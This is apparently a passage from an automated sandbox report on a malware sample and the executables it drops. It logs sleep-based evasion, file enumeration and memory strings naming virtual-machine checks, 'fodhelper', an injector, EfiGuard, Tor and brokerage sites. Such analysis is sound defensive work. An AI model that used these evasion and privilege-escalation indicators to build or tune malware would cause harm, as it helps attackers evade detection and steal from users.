Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -99266s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -99156s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -99046s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -98918s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 2892 | Thread sleep time: -98812s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4144 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44144 | Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44308 | Thread sleep count: 8001 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -599859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44308 | Thread sleep count: 1635 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -599746s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -599578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -599249s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -599125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -599007s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -598755s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -598625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -598421s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -597125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -596999s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -596859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -596703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -596575s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -596381s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -596250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -596136s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -596026s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -595920s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -595779s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -595667s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -595558s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -595426s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -595312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -595200s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -594987s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -594859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -594691s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -594547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -594375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -594214s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -594065s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -593937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -593828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -593704s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -593584s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -593453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -593326s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -593202s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -593090s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -592980s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -592812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -592672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -592522s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -592387s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -592264s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -592140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -592003s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -591875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -591765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44288 | Thread sleep time: -591656s >= -30000s
Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe TID: 44316 | Thread sleep time: -58000s >= -30000s
Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe TID: 1124 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe File Volume queried: C:\Users\user\Desktop FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_00452A60 FindFirstFileA,GetLastError, 15_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 15_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 15_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 15_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 15_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp Code function: 15_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 15_2_00463CDC
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe Code function: 21_2_00408123 FindFirstFileA,FindClose, 21_2_00408123
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe Code function: 21_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 21_2_004085B8
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exe Code function: 21_2_0040342B FindFirstFileA, 21_2_0040342B
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe Code function: 14_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 14_2_00409B78
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 100000
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99875
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99766
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99656
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99517
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99391
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99266
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99156
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99046
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98918
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 98812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 300000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599746
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598755
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 598421
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596575
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596381
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596136
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596026
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595920
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595779
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595667
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595558
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595426
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594987
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594691
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594375
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594214
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594065
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593937
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593584
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593326
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593202
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593090
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592980
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592522
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592003
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 591875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 591765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 591656
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe Thread delayed: delay time: 60000
                    Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                    Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
                    Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                    Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
                    Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: syncUpd.exe, 00000016.00000003.3062250195.0000000026ECB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                    Source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
                    Source: svchost.exe, 00000002.00000002.3392661017.0000021914E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3432539216.000002191A459000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.0000000000808000.00000004.00000020.00020000.00000000.sdmp, simplewebbuilder.exe, 00000011.00000002.3380805385.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000749000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000749000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000749000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3370913149.00000000006A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000857000.00000004.00000020.00020000.00000000.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
